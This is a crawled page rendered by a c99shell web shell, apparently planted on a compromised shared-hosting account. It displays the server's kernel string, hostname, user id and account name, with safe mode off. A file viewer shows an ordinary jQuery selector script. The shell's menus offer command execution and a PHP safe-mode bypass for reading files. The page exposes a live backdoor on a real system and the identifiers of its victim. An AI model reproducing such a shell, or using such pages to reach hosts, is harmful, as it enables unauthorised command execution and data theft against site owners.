Software: Apache. PHP/5.4.45 uname -a: Linux webm052.cluster007.gra.hosting.ovh.net 5.15.74-ovh-vps-grsec-zfs-classid #1 SMP Wed uid=763961(ebenisteaz) gid=100(users) groups=100(users) Safe-mode: OFF (not secure) /home/ebenisteaz/www/js/ drwx---r-x |
Viewing file: ie.js (1.7 KB) -rw----r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | /* * jQuery Extra Selectors - (c) Keith Clark freely distributable under the terms of the MIT license. * * twitter.com/keithclarkcouk * www.keithclark.co.uk */ (function($) { function getNthIndex(cur, dir) { var t = cur, idx = 0; while (cur = cur[dir] ) { if (t.tagName == cur.tagName) { idx++; } } return idx; } function isNthOf(elm, pattern, dir) { var position = getNthIndex(elm, dir), loop; if (pattern == "odd" || pattern == "even") { loop = 2; position -= !(pattern == "odd"); } else { var nth = pattern.indexOf("n"); if (nth > -1) { loop = parseInt(pattern, 10) || parseInt(pattern.substring(0, nth) + "1", 10); position -= (parseInt(pattern.substring(nth + 1), 10) || 0) - 1; } else { loop = position + 1; position -= parseInt(pattern, 10) - 1; } } return (loop<0 ? position<=0 : position >= 0) && position % loop == 0 } var pseudos = { "first-of-type": function(elm) { return getNthIndex(elm, "previousSibling") == 0; }, "last-of-type": function(elm) { return getNthIndex(elm, "nextSibling") == 0; }, "only-of-type": function(elm) { return pseudos["first-of-type"](elm) && pseudos["last-of-type"](elm); }, "nth-of-type": function(elm, i, match) { return isNthOf(elm, match[3], "previousSibling"); }, "nth-last-of-type": function(elm, i, match) { return isNthOf(elm, match[3], "nextSibling"); } } $.extend($.expr[':'], pseudos); }(jQuery)); $("footer article:nth-of-type(4n-3), .columns>.col2:nth-of-type(2n-1), .columns>.col3:nth-of-type(3n-2), .columns>.col4:nth-of-type(4n-3), .columns>.col34:nth-of-type(4n-3), .columns>.col5:nth-of-type(5n-4), .columns>.col6:nth-of-type(6n-5)").css("margin-left", "0"); |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c99shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | Generation time: 0.0275 ]-- |